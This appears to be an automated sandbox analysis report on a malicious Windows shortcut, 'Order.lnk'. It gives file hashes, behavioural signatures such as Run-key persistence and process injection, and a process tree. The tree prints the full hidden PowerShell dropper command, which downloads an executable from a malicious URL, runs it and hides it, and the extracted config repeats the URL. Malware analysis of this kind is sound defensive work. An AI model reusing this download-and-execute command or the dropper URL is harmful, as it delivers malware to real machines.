Analysis

  • max time kernel
    11s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-03-2024 10:27

General

  • Target

    Order/Order.lnk

  • Size

    2KB

  • MD5

    f88d5c71b79d93f336a5fbc20deeb9dd

  • SHA1

    1f77d2879725462577a73adbf83d07c60eb6a384

  • SHA256

    a4e51b364548e87948d0075a8adffcd901d2876950ce6f0a939413a0d450b752

  • SHA512

    e369ed33574528497c330c79630e49971b4398bc089f239648c270774a62086436a36503db5052d9df72a56a0a8113ac0c9c09e7d86b41ad999c15e1cfc404d2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Order\Order.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command OpenWith.exe;(new-object System.Net.WebClient).DownloadFile('http://busyestinglsv.site/cmeo/ahbsfrbahogrfoweybrzhfbshdlhabdfhbawvgfrweifrvboherjbvfwr/zxfhvgkhchbavsdfabvlgf1244rhgv5hvkghvkhvkh6vkgvh/clips.exe','yjtjewi.exe');./'yjtjewi.exe';(get-item 'yjtjewi.exe').Attributes += 'Hidden';
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5092
      • C:\Windows\system32\OpenWith.exe
        "C:\Windows\system32\OpenWith.exe"
        3⤵
          PID:2768
        • C:\Users\Admin\AppData\Local\Temp\Order\yjtjewi.exe
          "C:\Users\Admin\AppData\Local\Temp\Order\yjtjewi.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:1412
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            4⤵
              PID:2084
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 80
                5⤵
                • Program crash
                PID:2296
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2084 -ip 2084
        1⤵
          PID:3892

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Order\yjtjewi.exe

          Filesize

          926KB

          MD5

          3deef79bb599036ce546fcc8db2a454f

          SHA1

          53484b19b20040c56e1101cad9be8a981bcf3e31

          SHA256

          eba68f3151d5fa565b6545341bc80f1353af4d43545335643d450ba0b3653b06

          SHA512

          6e947f4b44ebaeae5b6cb0ae1222e24a8999ddeeecb5248d83249f120a3005403e780f5e3612039e234b4931057d6fdd2d4afac23ffd0e87e0f331d6f8f42542

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ot0x4lud.vfa.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\aut5CB6.tmp

          Filesize

          104KB

          MD5

          3286d0dfdd1416b2a478739e2cc2e456

          SHA1

          a893e482016cbef3984bc52483e1b551a1a32638

          SHA256

          15e91c2587a346dea656a42c37697db0fbdd0682315b64fd6270a07181030f9b

          SHA512

          48b92bf8ddfa8e4d116c1394feb5e64c36838d130bc53ddadcfb8c1df38ec209e26e10a1d9829ebcf005d3e462636eef330d23d298986b76f74368fa06b5d068

        • memory/5092-2-0x00000214B2200000-0x00000214B2222000-memory.dmp

          Filesize

          136KB

        • memory/5092-12-0x00007FF9FB120000-0x00007FF9FBBE1000-memory.dmp

          Filesize

          10.8MB

        • memory/5092-13-0x00000214B21C0000-0x00000214B21D0000-memory.dmp

          Filesize

          64KB

        • memory/5092-14-0x00000214B21C0000-0x00000214B21D0000-memory.dmp

          Filesize

          64KB

        • memory/5092-23-0x00007FF9FB120000-0x00007FF9FBBE1000-memory.dmp

          Filesize

          10.8MB